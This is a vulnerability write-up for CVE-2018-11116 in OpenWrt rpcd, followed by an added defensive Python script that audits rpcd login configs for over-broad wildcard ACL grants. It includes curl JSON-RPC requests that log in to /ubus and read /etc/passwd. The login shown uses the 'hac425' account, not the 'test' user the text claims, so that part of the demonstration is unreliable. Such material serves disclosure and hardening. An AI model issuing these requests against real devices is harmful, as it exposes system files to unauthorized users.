• [CVE-2018-11116] OpenWrt rpcd: a configuration file error makes access control ineffective


    Users can access ubus over HTTP. This path depends on the rpcd service. When the rpcd ACL is misconfigured, the ACL can stop working altogether.

    Steps to reproduce the problem

    First you need a machine running OpenWrt, and you install uhttpd and luci to provide the HTTP service.

    opkg update
    opkg install luci
    

    Then install some tools to add users in OpenWrt.

    opkg install shadow-common
    opkg install shadow-useradd
    opkg install rpcd-mod-file  
    

    Then I add 2 users and let them log in to rpcd by modifying the rpcd config file.

    root@OpenWrt:~# cat /etc/config/rpcd
    
    config login
        option username 'hac425'
        option password '$p$hac425'
        list read '*'
        list write '*'
    config login
        option username 'test'
        option password '$p$test'
        list read '*'
        list write '*'
    

    Next I create a config file that provides an ACL for the user whose username is hac425 (the config file comes from the OpenWrt wiki).

    root@OpenWrt:/usr/share/rpcd/acl.d# cat hac425.json 
    {
            "hac425": {
                    "description": "acl for hac425",
                    "read": {
                            "ubus": {
                                    "file": [ "*" ],
                                    "log": [ "*" ],
                                    "service": [ "*" ],
                            },
                    },
                    "write": {
                            "ubus": {
                                    "file": [ "*" ],
                                    "log": [ "*" ],
                                    "service": [ "*" ],
                            },
                    }
            }
    }
    root@OpenWrt:/usr/share/rpcd/acl.d# 
    

    This lets hac425 call all methods in the file namespace ( "file": [ "*" ] ).

    I didn't create an ACL file for the user named test, which means the test user should only be able to call the methods defined in unauthenticated.json.

    However, when I tested it, I found that the test user can also call the methods which are only allowed to the hac425 user.
    For example, the test user can call the read method in the file namespace, which is not permitted to him.

    Next I will show it.
    First I log in with the test user's username and password and get the ubus_rpc_session (this value is used to call the other methods defined in the ACL config files).

    06:28 haclh@ubuntu:tmp $ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "00000000000000000000000000000000", "session", "login", { "username": "hac425", "password": "123"  } ] }'  http://192.168.31.111/ubus
    
    {"jsonrpc":"2.0","id":1,"result":[0,{"ubus_rpc_session":"ba431d9f9791b7021389a03906c70fbf","timeout":300,"expires":300,"acls":{"access-group":{"hac425":["read","write"],"uci-access":["read","write"],"unauthenticated":["read"]},"ubus":{"file":["*"],"log":["*"],"service":["*"],"session":["access","login"]},"uci":{"*":["read","write"]}},"data":{"username":"hac425"}}]}
    

    Then use the ubus_rpc_session to call the read method in the file namespace to read the content of /etc/passwd.

    06:30 haclh@ubuntu:tmp $ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "ba431d9f9791b7021389a03906c70fbf", "file", "read", { "path": "/etc/passwd" } ] }'  http://192.168.31.111/ubus
    {"jsonrpc":"2.0","id":1,"result":[0,{"data":"root:x:0:0:root:/root:/bin/ash
    daemon:*:1:1:daemon:/var:/bin/false
    ftp:*:55:55:ftp:/home/ftp:/bin/false
    network:*:101:101:network:/var:/bin/false
    nobody:*:65534:65534:nobody:/var:/bin/false
    dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
    hac425:x:1000:1000::/home/hac425:
    test:x:1001:1001::/home/test:
    "}]}
    

    So we get the file content.

    This means that I can use the test user to call the read method which is not permitted to the test user, bypassing the ACL.

    Conclusion

    The vulnerability may cause the rpcd ACL to stop working.
    This lets a malicious user call methods which are only permitted to another user.
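    The root of the behaviour shown above is the login config itself: both users carry list read '*' and list write '*', and each of those entries is matched against the names of the ACL groups in /usr/share/rpcd/acl.d, so a wildcard hands every group (hac425, uci-access, unauthenticated) to every login, which is exactly what the "access-group" field in the login response shows. The following audit script is an added example, not part of the original write-up or of the rpcd project. It assumes that rpcd matches each read/write entry against group names as a shell-style glob, and it uses constructed copies of the page's config and of two acl.d files (hac425.json from the page, and a minimal unauthenticated.json as an assumed stand-in). It computes the effective groups of each login, tests whether a given ubus call is permitted, and flags login entries whose glob grants more than one group, then shows the same checks against a corrected config that lists only the intended group per user.

```python
"""Audit an OpenWrt rpcd login config for over-broad ACL group grants (added example)."""
import fnmatch
import re

# Constructed copy of the weak /etc/config/rpcd from the write-up.
RPCD_CONFIG_WEAK = """
config login
    option username 'hac425'
    option password '$p$hac425'
    list read '*'
    list write '*'
config login
    option username 'test'
    option password '$p$test'
    list read '*'
    list write '*'
"""

# Corrected form (assumption: each login names only the groups it needs;
# test gets the unauthenticated group only, and no write grant at all).
RPCD_CONFIG_FIXED = """
config login
    option username 'hac425'
    option password '$p$hac425'
    list read 'hac425'
    list write 'hac425'
config login
    option username 'test'
    option password '$p$test'
    list read 'unauthenticated'
"""

# Constructed stand-ins for /usr/share/rpcd/acl.d/*.json: file -> {group: scopes}.
ACL_FILES = {
    "hac425.json": {"hac425": {
        "description": "acl for hac425",
        "read": {"ubus": {"file": ["*"], "log": ["*"], "service": ["*"]}},
        "write": {"ubus": {"file": ["*"], "log": ["*"], "service": ["*"]}}}},
    "unauthenticated.json": {"unauthenticated": {  # assumed minimal content
        "description": "allow login and session probing",
        "read": {"ubus": {"session": ["access", "login"]}}}},
}


def parse_logins(text):
    """Parse the 'config login' sections of a UCI rpcd file into dicts."""
    logins, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("config login"):
            cur = {"username": None, "read": [], "write": []}
            logins.append(cur)
        elif cur is not None:
            m = re.match(r"(option|list)\s+(\w+)\s+'([^']*)'", line)
            if not m:
                continue
            kind, key, val = m.groups()
            if kind == "option" and key == "username":
                cur["username"] = val
            elif kind == "list" and key in ("read", "write"):
                cur[key].append(val)
    return logins


def all_groups(acl_files):
    """Merge every acl.d file into one {group: scopes} mapping."""
    groups = {}
    for acls in acl_files.values():
        groups.update(acls)
    return groups


def effective_groups(login, groups):
    """Groups a login receives per mode; entries are treated as globs (assumption)."""
    out = {}
    for mode in ("read", "write"):
        matched = set()
        for pattern in login[mode]:
            matched.update(g for g in groups if fnmatch.fnmatchcase(g, pattern))
        out[mode] = sorted(matched)
    return out


def can_call(login, groups, mode, namespace, method):
    """Whether the login's effective ACL permits ubus <namespace>.<method> in <mode>."""
    for g in effective_groups(login, groups)[mode]:
        allowed = groups[g].get(mode, {}).get("ubus", {}).get(namespace, [])
        if any(fnmatch.fnmatchcase(method, p) for p in allowed):
            return True
    return False


def audit(config_text, acl_files):
    """Return {username: [finding, ...]}; a finding is a glob that grants >1 group."""
    groups = all_groups(acl_files)
    findings = {}
    for login in parse_logins(config_text):
        issues = []
        for mode in ("read", "write"):
            for pattern in login[mode]:
                hits = sorted(g for g in groups if fnmatch.fnmatchcase(g, pattern))
                if any(c in pattern for c in "*?[") and len(hits) > 1:
                    issues.append(f"{mode} '{pattern}' grants {len(hits)} groups: {', '.join(hits)}")
        findings[login["username"]] = issues
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", RPCD_CONFIG_WEAK), ("fixed", RPCD_CONFIG_FIXED)):
        groups = all_groups(ACL_FILES)
        print(f"== {name} config ==")
        for login in parse_logins(cfg):
            print(login["username"], effective_groups(login, groups),
                  "file.read:", can_call(login, groups, "read", "file", "read"))
        print("findings:", audit(cfg, ACL_FILES))
```

    Run on a real router, the same logic would read /etc/config/rpcd and glob /usr/share/rpcd/acl.d/*.json instead of the embedded strings; the point of the check is that a wildcard in a login's read or write list is a finding whenever more than one group file exists, because the login then inherits every group, including ones added later.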

  • Original article: https://www.cnblogs.com/hac425/p/9416859.html